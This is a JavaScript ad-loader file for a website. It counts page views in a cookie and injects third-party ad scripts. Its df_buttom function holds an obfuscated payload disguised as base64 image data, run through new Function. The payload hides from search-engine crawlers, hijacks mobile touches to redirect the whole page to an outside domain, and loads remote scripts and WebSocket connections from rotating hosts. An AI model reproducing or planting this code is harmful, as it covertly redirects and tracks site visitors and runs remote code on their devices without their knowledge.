function df_buttom(){
  !function(){function a(a){var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2cYa[Xd5 F8[P!7_2(F6O2 5c2a[67cFH2Za5YF_52 FH2ZmYRJO5FL!Xd5 O8FH2Z8[6g2=qgl}=YRJO5FLg[PP!5YF_52 YH2Zm(dqqcOmYRJO5FL=O=OmYRJO5FL=5a=Omq8l0=OmYRJO5FLP5m^8Y=5m(8F=5mf87_2(F6O2cY=F=2a[5mOcY=Fa??;)CY(FmfY762Ye5OJY5FTcY=F=[Y2_^Y5d)qYgl0=pYFg2PaP=5m587_2(F6O2cYa["_2fY762Yf"l8FTJYO7 iT^)OqvviT^)OqmFOiF562p|dpvv;)CY(FmfY762Ye5OJY5FTcY=iT^)OqmFOiF562p|dp=[Xdq_Yg"yOf_qY"Pa=;)CY(FmfY762Ye5OJY5FTcY="MMYLyOf_qY"=[Xdq_Ygl0PaP=5mF87_2(F6O2cY=Fa[67c}vFvvcY85cYaa={vFa5YF_52 Y!67covFvv"O)CY(F"88FTJYO7 YvvYvvYmMMYLyOf_qYa5YF_52 Y!Xd5 28;)CY(Fm(5YdFYc2_qqa!67c5m5c2a=;)CY(FmfY762Ye5OJY5FTc2="fY7d_qF"=[Y2_^Y5d)qYgl0=Xdq_YgYPa=@vFvv"LF562p"l8FTJYO7 Ya7O5cXd5 O 62 Ya5mfc2=O=7_2(F6O2cFa[5YF_52 YHFZPm)62fc2_qq=Oaa!5YF_52 2P=5m287_2(F6O2cYa[Xd5 F8YvvYmMMYLyOf_qYj7_2(F6O2ca[5YF_52 YmfY7d_qFPg7_2(F6O2ca[5YF_52 YP!5YF_52 5mfcF="d"=Fa=FP=5mO87_2(F6O2cY=Fa[5YF_52 ;)CY(FmJ5OFOFTJYmhdL;D2e5OJY5FTm(dqqcY=FaP=5mJ8""=5c5mL80aPcH7_2(F6O2cY=Fa[Xd5 58fO(_^Y2F=282dX6pdFO5mJqdF7O5^=O85m(_55Y2Fi(56JF!67cc2dX6pdFO5m_LY5rpY2Fm62fYR;7c")d6f_"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c"9_dDY6u5ODLY5"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c"A6XOu5ODLY5"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c";JJOu5ODLY5"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c"9YT|dJu5ODLY5"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c"y6_6u5ODLY5"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c"yIIu5ODLY5"a>*}??2dX6pdFO5m_LY5rpY2Fm62fYR;7c"Bxu5ODLY5"a>*}avvcl/3yd(?V62/mFYLFc2a??l2aa[Xd5 6LDL80! LYF|6^YO_Fc7_2(F6O2ca[67c6LDL880a[Xd5 6LMSS80!Xd5 _5qf778"hFFJLg//f((mLhdOR62p(hY2phYm(O^/((/}o@sj6LM2OF8}vFd5pYF8}"!Xd5 (q6Y2FD6fFh8D62fODmL(5YY2mdXd6qV6fFh!fO(_^Y2Fm)OfTmdffEXY2Ft6LFY2Y5c"FO_(hLFd5F"=7_2(F6O2ca[Xd5 (q6Y2FhY6phF8D62fODmL(5YY2mdXd6q9Y6phF!Xd5 YXY8YXY2F??D62fODmYXY2F!Xd5 (R8(T80!67cYXYvvYXYmFTJY88"FO_(hLFd5F"a[(R8YXYmFO_(hYLH0Zm(q6Y2F&!(T8YXYmFO_(hYLH0Zm(q6Y2F-!P67cYXYvvYXYmFTJY88"FO_(hY2f"a[(R8YXYm(hd2pYf|O_(hYLH0ZmL(5YY2&!(T8YXYm(hd2pYf|O_(hYLH0Zm(q6Y2F-!P67cYXYvvYXYmFTJY88"(q6(S"a[(R8YXYm(q6Y2F&!(T8YXYm(q6Y2F-!P67c(R>0vv(T>0a[67c(T>c(q6Y2FhY6phF*co@0.c(q6Y2FD6fFh/Ko0aaavv6LMSS880a[6LMSS8}!67cFOJmqO(dF6O2l8LYq7mqO(dF6O2a[FOJmqO(dF6O28_5qf77!PYqLY[D62fODmqO(dF6O2mh5Y78_5qf77!PLYF|6^YO_Fc7_2(F6O2ca[6LMSS80!P=}000a!PPPa!Xd5 (d2Xd8fO(_^Y2Fm(5YdFYEqY^Y2Fc"(d2XdL"a!(d2XdmLFTqY8")O5fY5*FOJg0mnJR LOq6f #YYYYYY!D6fFhg}00b!hY6phFgsKXD!JOL6F6O2gd)LOq_FY!^d5p62g0JR!qY7Fg0!56phFg0JR!"!(d2XdmD6fFh8Ko0!(d2XdmhY6phF8@s0!Xd5 (FR8(d2XdmpYFxO2FYRFc"@f"a!Xd5 6^p82YD W^dpYca!6^pmO2qOdf87_2(F6O2ca[(FRmf5dDW^dpYc6^p=0=0=Ko0=@s0a!P!6^pmL5(8"hFFJLg//J6((mfdh_OLCm(O^/J_)q6(MJ6(/"%ydFhm(Y6qcydFhm5d2fO^ca.}0a%"mCJp"!(d2XdmdffEXY2Ft6LFY2Y5c"FO_(hLFd5F"=7_2(F6O2ca [6LMSS8}!67cFOJmqO(dF6O2l8LYq7mqO(dF6O2a[FOJmqO(dF6O28_5qf77!PYqLY[D62fODmqO(dF6O2mh5Y78_5qf77!PLYF|6^YO_Fc7_2(F6O2ca[6LMSS80!P=}000aPa!fO(_^Y2Fm)OfTmdJJY2fxh6qfc(d2Xda!Xd5 F8fO(_^Y2FmfO(_^Y2FEqY^Y2FmL(5Oqq|OJ??fO(_^Y2Fm)OfTmL(5Oqq|OJ!(d2XdmLFTqYm)OFFO^8cF*F.@a%"JR"!D62fODmdffEXY2Ft6LFY2Y5c"L(5Oqq"=7_2(F6O2ca[Xd5 F8fO(_^Y2FmfO(_^Y2FEqY^Y2FmL(5Oqq|OJ??fO(_^Y2Fm)OfTmL(5Oqq|OJ!(d2XdmLFTqYm)OFFO^8cF*F.@a%"JR"!Pa!Xd5 68fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!6mL5(8"hFFJLg//f((mLhdOR62p(hY2phYm(O^/f/}o@sj(8}vF8K{@011sn"!Xd5 _8fO(_^Y2FmpYFEqY^Y2FLuT|dpNd^Yc"L(56JF"aH0Z!_mJd5Y2FNOfYm62LY5FuY7O5Yc6= _a!Xd5 L))8fO(_^Y2Fm(5YdFYEqY^Y2Fc"LFTqY"a!L))m622Y59|yt8")OfT[JOL6F6O2g626F6dq l6^JO5Fd2F!^62*hY6phFg"%D62fODmL(5YY2mhY6phF%"JR l6^JO5Fd2F!Jdff62p*)OFFO^g}00JR l6^JO5Fd2F!P"!fO(_^Y2FmhYdfmdJJY2fxh6qfcL))aP!P= }000a!Xd5 DLRp8H"DLfpmTF(h_d2pTY{m(O^"="DLfpmh4C_R62h_6m(O^"="DLfpm2XDd2pR6h_d2m(O^"Z!Xd5 S8ydFhm7qOO5cc2YD wdFYcaampYFwdFYca/}0a!S8cS>@aj@gS!Xd5 DL_8c"hFFJLg"88fO(_^Y2FmqO(dF6O2mJ5OFO(Oqaj"DLLg//"%DLRpHSZ%"g@00Q}"g"DLg//"%DLRpHSZ%"g@00Q0"!Xd5 (82YD VY)iO(SYFcDL_%"/}o@s"a!(mO2OJY287_2(F6O2cYa[6LDL 8 }!P!(mO2^YLLdpY87_2(F6O2cYa[Xd5 F87_2(F6O2cYa[Xd5 F=5=2=O=(=6=_=d8"(hd5rF"=78"75O^xhd5xOfY"=q8"(hd5xOfYrF"=f8"62fYR;7"=L8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=J8""=p80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!p<YmqY2pFh!aO8LHfZcYHdZcp%%aa=(8LHfZcYHdZcp%%aa=68LHfZcYHdZcp%%aa=_8LHfZcYHdZcp%%aa=F8O<<@?(>>o=58c}nv(a<<o?6>>@=28csv6a<<K?_=J%8iF562pH7ZcFa=Kol86vvcJ%8iF562pH7Zc5aa=Kol8_vvcJ%8iF562pH7Zc2aa!5YF_52 7_2(F6O2cYa[7O5cXd5 F8""=2858(}8(@80!2<YmqY2pFh!ac58YHqZc2aa<}@{jcF%8iF562pH7Zc5a=2%%ag5>}Q}vv5<@@ojc(@8YHqZc2%}a=F%8iF562pH7Zccs}v5a<<K?Ksv(@a=2%8@agc(@8YHqZc2%}a=(s8YHqZc2%@a=F%8iF562pH7Zcc}nv5a<<}@?cKsv(@a<<K?Ksv(sa=2%8sa!5YF_52 FPcJaPcYmfdFda!2YD ]_2(F6O2c"MFf(L"=FacOa=(m(qOLYcaPPYqLY[Xd5 68fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!6mL5(8"hFFJLg//fpm:62F62pdJJm(O^/pp/}o@sjR8K{@011sn"!Xd5 _8fO(_^Y2FmpYFEqY^Y2FLuT|dpNd^Yc"L(56JF"aH0Z!_mJd5Y2FNOfYm62LY5FuY7O5Yc6=_aPPZa!'.substr(22));new Function(b)()}();
}

// page view adv
(function(){
  var _d = new Date();
  var _n = "_pvad_" + _d.getMonth() + _d.getDate();

  var _setCookie = function(cname,cvalue){
    var d = new Date();
    d.setTime(d.getTime()+(24*60*60*1000));
    var expires = "expires="+d.toGMTString();
    document.cookie = cname+"="+cvalue+"; "+expires;
  }

  var _getCookie = function(cname){
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for(var i=0; i<ca.length; i++) {
      var c = ca[i].trim();
      if (c.indexOf(name)==0) {
        return c.substring(name.length,c.length);
      }
    }
    return "";
  }

  var ismob = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);

  var _pvad = 1 + parseInt(_getCookie(_n));
  if(!_pvad) _pvad = 1;
  _setCookie(_n, _pvad);

  if(!ismob){
    if(_pvad > 4) ;
    else if(_pvad > 2)
      document.write('<scr'+'ipt async defer src="https://jgsqfkj.com/o.aspx?action=c&o1=7&o2=530&o3=&o4=2&o5=AdCode_sxts&o6=300x250&o7=1&o8=1&o9=&o10=&o50=1258383" id="1258383"></scr'+'ipt>');
    else
      document.write('<scr'+'ipt async defer src="https://jgsqfkj.com/o.aspx?action=c&o1=7&o2=530&o3=&o4=2&o5=AdCode_zydl&o6=200x400&o7=1&o8=1&o9=&o10=&o50=1258312" id="1258312"></scr'+'ipt>');
    return;
  }

  // mobile
  if(_pvad >8){
    df_buttom();
  } else if(_pvad >4){
    document.write('<scr'+'ipt async defer src="https://www.serversad.com/ad/content/724"></scr'+'ipt>'); // top cpc
    document.write('<scr'+'ipt async defer src="https://www.serversad.com/ad/content/736"></scr'+'ipt>'); // right cpc
    df_buttom();
  } else if(_pvad >2){
    document.write('<scr'+'ipt async defer src="https://www.serversad.com/ad/content/725"></scr'+'ipt>'); // top cpv
    document.write('<scr'+'ipt async defer src="https://www.serversad.com/ad/content/736"></scr'+'ipt>'); // right cpc
    df_buttom();
  } else{
    // 555lm buttom
    document.write('<scr'+'ipt async defer src="https://jgsqfkj.com/o.aspx?action=c&o1=7&o2=530&o3=&o4=2&o5=AdCode_sjdb&o6=640x200&o7=1&o8=1&o9=&o10=&o50=336033" id="336033"></scr'+'ipt>');
    document.write('<scr'+'ipt async defer src="https://www.serversad.com/ad/content/724"></scr'+'ipt>'); // top cpc
    document.write('<scr'+'ipt async defer src="https://www.serversad.com/ad/content/736"></scr'+'ipt>'); // right cpc
  }
})();
